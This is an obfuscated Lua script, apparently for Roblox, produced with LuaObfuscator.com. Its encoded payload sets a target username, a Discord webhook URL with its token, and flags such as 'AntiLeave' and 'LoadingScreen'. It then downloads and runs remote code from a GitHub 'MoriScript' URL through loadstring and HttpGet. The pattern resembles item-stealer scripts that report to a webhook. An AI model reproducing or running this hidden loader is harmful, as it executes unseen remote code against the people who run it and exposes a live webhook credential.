--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.9) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v69=v2(v0(v30,16));if v19 then local v76=0;local v77;while true do if (v76==1) then return v77;end if (v76==0) then v77=v5(v69,v19);v19=nil;v76=1;end end else return v69;end end end);local function v20(v31,v32,v33)if v33 then local v70=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-((879 -(282 + 595)) -1)) -(v32-(620 -(555 + (1701 -(1523 + 114)))))) + 1)) ;return v70-(v70%(932 -(857 + 67 + 7))) ;else local v71=0;local v72;while true do if (v71==(568 -(367 + 201))) then v72=(929 -(214 + 713))^(v32-1) ;return (((v31%(v72 + v72))>=v72) and (1 + 0)) or (0 + 0) ;end end end end local function v21()local v34=0 -0 ;local v35;while true do if (v34==(118 -(32 + 85))) then return v35;end if (v34==(1065 -(68 + 997))) then v35=v1(v16,v18,v18);v18=v18 + (1271 -(226 + 1044)) ;v34=4 -3 ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + 2 + 0 ;return (v37 * (57 + 199)) + v36 ;end local function v23()local v38=0;local v39;local v40;local v41;local v42;while true do if (v38==(958 -(892 + 65))) then return (v42 * (40022563 -23245347)) + (v41 * (121138 -55602)) + (v40 * (188 + 68)) + v39 ;end if (v38==0) then v39,v40,v41,v42=v1(v16,v18,v18 + (4 -1) );v18=v18 + ((868 -514) -(87 + 263)) ;v38=181 -(67 + 84 + 29) ;end end end local function v24()local v43=v23();local v44=v23();local v45=3 -(6 -4) ;local v46=(v20(v44,953 -(802 + 150) ,53 -33 ) * (2^(57 -25))) + v43 ;local v47=v20(v44,16 + 5 ,31);local v48=((v20(v44,(1467 -(145 + 293)) -(915 + 82) )==(2 -1)) and  -((431 -(44 + 386)) + 0)) or (1 -0) ;if (v47==((2673 -(998 + 488)) -(1069 + 118))) then if (v46==(0 -0)) then return v48 * (0 -0) ;else v47=1;v45=0 + 0 ;end elseif (v47==(3636 -1589)) then return ((v46==(0 + 0 + 0 + 0)) and (v48 * ((792 -(368 + 423))/((0 + 0) -0)))) or (v48 * NaN) ;end return v8(v48,v47-(1041 -(10 + (13 -5))) ) * (v45 + (v46/((7 -5)^(494 -(416 + 26))))) ;end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(1138 -(116 + 1022))) then return "";end end v50=v3(v16,v18,(v18 + v49) -(4 -3) );v18=v18 + v49 ;local v51={};for v67=1, #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 + 0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52==(1 -0)) then v55=nil;v56=nil;v52=2 -0 ;end if (v52==(1386 -(746 + 638))) then v57=nil;v58=nil;v52=2 + 1 ;end if (0==v52) then v53=0 -0 ;v54=nil;v52=342 -(218 + 123) ;end if (v52==(1584 -(1535 + 46))) then v59=nil;while true do local v78=0 + 0 ;while true do if (v78==(0 + 0)) then if (v53==0) then local v101=560 -(306 + 254) ;local v102;while true do if (v101==(0 + 0)) then v102=0;while true do if (0~=v102) then else local v117=0;while true do if (1~=v117) then else v102=1;break;end if (v117~=(0 -0)) then else v54={};v55={};v117=1;end end end if (v102~=(1468 -(899 + 568))) then else v56={};v53=1 + 0 ;break;end end break;end end end if (v53~=(4 -2)) then else local v103=0;local v104;while true do if ((603 -(268 + 335))~=v103) then else v104=0;while true do if (v104~=0) then else local v118=290 -(60 + 230) ;while true do if (v118==(573 -(426 + 146))) then v104=1 + 0 ;break;end if (v118==0) then for v158=1,v58 do local v159=0;local v160;local v161;local v162;while true do if (v159==0) then v160=1456 -(282 + 1174) ;v161=nil;v159=812 -(569 + 242) ;end if (v159==1) then v162=nil;while true do if (v160==(0 -0)) then v161=v21();v162=nil;v160=1;end if (v160==1) then if (v161==(1 + 0)) then v162=v21()~=(1024 -(706 + 318)) ;elseif (v161==2) then v162=v24();elseif (v161~=(1254 -(721 + 530))) then else v162=v25();end v59[v158]=v162;break;end end break;end end end v57[3]=v21();v118=1;end end end if (v104~=1) then else for v122=1,v23() do local v123=1271 -(945 + 326) ;local v124;local v125;local v126;local v127;while true do if (v123==(0 -0)) then v124=0 + 0 ;v125=nil;v123=1;end if (v123~=2) then else while true do if (v124==0) then local v193=0;while true do if ((700 -(271 + 429))==v193) then v125=0 + 0 ;v126=nil;v193=1;end if (v193==(1501 -(1408 + 92))) then v124=1;break;end end end if (v124~=1) then else v127=nil;while true do if (v125~=(1087 -(461 + 625))) then else while true do if (v126==(1288 -(993 + 295))) then v127=v21();if (v20(v127,1,1 + 0 )==(1171 -(418 + 753))) then local v199=0;local v200;local v201;local v202;local v203;while true do if (v199==0) then v200=0 + 0 ;v201=nil;v199=1;end if (v199==1) then local v205=0;while true do if (v205==1) then v199=2;break;end if (v205==(0 + 0)) then v202=nil;v203=nil;v205=1;end end end if ((1 + 1)~=v199) then else while true do if (v200~=(0 + 0)) then else local v206=529 -(406 + 123) ;local v207;while true do if (v206~=(1769 -(1749 + 20))) then else v207=0;while true do if (0~=v207) then else local v216=0 + 0 ;while true do if (1~=v216) then else v207=1;break;end if (v216==(1322 -(1249 + 73))) then v201=v20(v127,1 + 1 ,1148 -(466 + 679) );v202=v20(v127,9 -5 ,17 -11 );v216=1;end end end if (v207==1) then v200=1;break;end end break;end end end if (v200~=1) then else local v208=1900 -(106 + 1794) ;while true do if (v208~=(0 + 0)) then else v203={v22(),v22(),nil,nil};if (v201==(114 -(4 + 110))) then local v214=584 -(57 + 527) ;local v215;while true do if (v214==(1427 -(41 + 1386))) then v215=103 -(17 + 86) ;while true do if (0==v215) then v203[3 + 0 ]=v22();v203[4]=v22();break;end end break;end end elseif (v201==(1 -0)) then v203[8 -5 ]=v23();elseif (v201==2) then v203[169 -(122 + 44) ]=v23() -((2 -0)^(52 -36)) ;elseif (v201~=(3 + 0)) then else local v222=0 + 0 ;local v223;local v224;while true do if ((0 -0)==v222) then v223=65 -(30 + 35) ;v224=nil;v222=1;end if (v222==(1 + 0)) then while true do if (0==v223) then v224=0;while true do if (0~=v224) then else v203[3]=v23() -(2^(1273 -(1043 + 214))) ;v203[15 -11 ]=v22();break;end end break;end end break;end end end v208=1213 -(323 + 889) ;end if ((2 -1)==v208) then v200=2;break;end end end if (v200~=(582 -(361 + 219))) then else local v209=0;local v210;while true do if (v209==(320 -(53 + 267))) then v210=0 + 0 ;while true do if (v210==(414 -(15 + 398))) then v200=985 -(18 + 964) ;break;end if ((0 -0)==v210) then local v217=0 + 0 ;while true do if (v217~=(0 + 0)) then else if (v20(v202,1,851 -(20 + 830) )==(1 + 0)) then v203[128 -(116 + 10) ]=v59[v203[1 + 1 ]];end if (v20(v202,740 -(542 + 196) ,3 -1 )==(1 + 0)) then v203[3]=v59[v203[2 + 1 ]];end v217=1 + 0 ;end if ((2 -1)==v217) then v210=1;break;end end end end break;end end end if (v200==(7 -4)) then if (v20(v202,3,3)==1) then v203[1555 -(1126 + 425) ]=v59[v203[4]];end v54[v122]=v203;break;end end break;end end end break;end end break;end if (v125~=(405 -(118 + 287))) then else local v197=0;local v198;while true do if (v197==(0 -0)) then v198=0;while true do if (1==v198) then v125=1122 -(118 + 1003) ;break;end if (v198~=0) then else local v204=0;while true do if (v204~=0) then else v126=0;v127=nil;v204=1;end if (v204==(2 -1)) then v198=1;break;end end end end break;end end end end break;end end break;end if ((378 -(142 + 235))~=v123) then else v126=nil;v127=nil;v123=2;end end end v53=3;break;end end break;end end end v78=4 -3 ;end if (v78~=1) then else if (3==v53) then local v105=0;local v106;while true do if (v105~=0) then else v106=0 + 0 ;while true do if (v106~=(977 -(553 + 424))) then else for v128=1 -0 ,v23() do v55[v128-(1 + 0) ]=v28();end return v57;end end break;end end end if (1==v53) then local v107=0 + 0 ;local v108;while true do if (v107==0) then v108=0 + 0 ;while true do if (v108==(1 + 0)) then v59={};v53=2 + 0 ;break;end if (v108==(0 -0)) then v57={v54,v55,nil,v56};v58=v23();v108=1;end end break;end end end break;end end end break;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (0==v63) then v64=v60[1];v65=v60[2];v63=1;end if (v63==1) then v66=v60[3];return function(...)local v79=v64;local v80=v65;local v81=v66;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do local v94=0;while true do if (v94==1) then if (v92<=5) then if (v92<=2) then if (v92<=0) then v89[v91[2]]();elseif (v92>1) then v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v62[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v62[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v62[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v62[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v62[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]][v91[3]]=v91[4];else v89[v91[2]][v91[3]]=v91[4];end elseif (v92<=3) then local v109=v91[2];local v110,v111=v82(v89[v109](v13(v89,v109 + 1 ,v91[3])));v84=(v111 + v109) -1 ;local v112=0;for v119=v109,v84 do v112=v112 + 1 ;v89[v119]=v110[v112];end elseif (v92==4) then v62[v91[3]]=v89[v91[2]];else local v140=0;local v141;local v142;local v143;local v144;local v145;while true do if (v140==4) then v89[v145]=v144[v91[4]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v140=5;end if (v140==6) then v91=v79[v83];v145=v91[2];v142,v143=v82(v89[v145](v13(v89,v145 + 1 ,v91[3])));v84=(v143 + v145) -1 ;v140=7;end if (v140==8) then v145=v91[2];v89[v145]=v89[v145](v13(v89,v145 + 1 ,v84));v83=v83 + 1 ;v91=v79[v83];v140=9;end if (0==v140) then v141=nil;v142,v143=nil;v144=nil;v145=nil;v140=1;end if (v140==5) then v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3]~=0 ;v83=v83 + 1 ;v140=6;end if (v140==9) then v89[v91[2]]();v83=v83 + 1 ;v91=v79[v83];do return;end break;end if (2==v140) then v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v62[v91[3]];v83=v83 + 1 ;v140=3;end if (v140==1) then v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v62[v91[3]];v140=2;end if (v140==3) then v91=v79[v83];v145=v91[2];v144=v89[v91[3]];v89[v145 + 1 ]=v144;v140=4;end if (v140==7) then v141=0;for v191=v145,v84 do local v192=0;while true do if (v192==0) then v141=v141 + 1 ;v89[v191]=v142[v141];break;end end end v83=v83 + 1 ;v91=v79[v83];v140=8;end end end elseif (v92<=8) then if (v92<=6) then v89[v91[2]]=v91[3]~=0 ;elseif (v92==7) then do return;end else local v146=0;local v147;while true do if (v146==0) then v147=v91[2];v89[v147]=v89[v147](v13(v89,v147 + 1 ,v84));break;end end end elseif (v92<=9) then local v114=0;local v115;local v116;while true do if (v114==0) then v115=v91[2];v116=v89[v91[3]];v114=1;end if (v114==1) then v89[v115 + 1 ]=v116;v89[v115]=v116[v91[4]];break;end end elseif (v92>10) then v89[v91[2]]=v91[3];else v89[v91[2]]=v62[v91[3]];end v83=v83 + 1 ;break;end if (0==v94) then v91=v79[v83];v92=v91[1];v94=1;end end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0E3O0003083O00557365724E616D6503063O00694D7873545203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3132363537323731393438303234323139362F316A446A777256615A6D4145637A4C327076687045596B4B596B7748616D485137737932664E354658357130523444675A7862315A6168432D4272413471384D2O70776803093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A00153O0012023O00023O00124O00013O00124O00043O00124O00033O00124O00023O00124O00053O00124O00063O00304O0007000800124O00063O00304O0009000800120A3O00063O0030053O000A000800124O000B3O00122O0001000C3O00202O00010001000D00122O0003000E6O000400016O000100049O0000026O000100016O00017O00",v9(),...);end
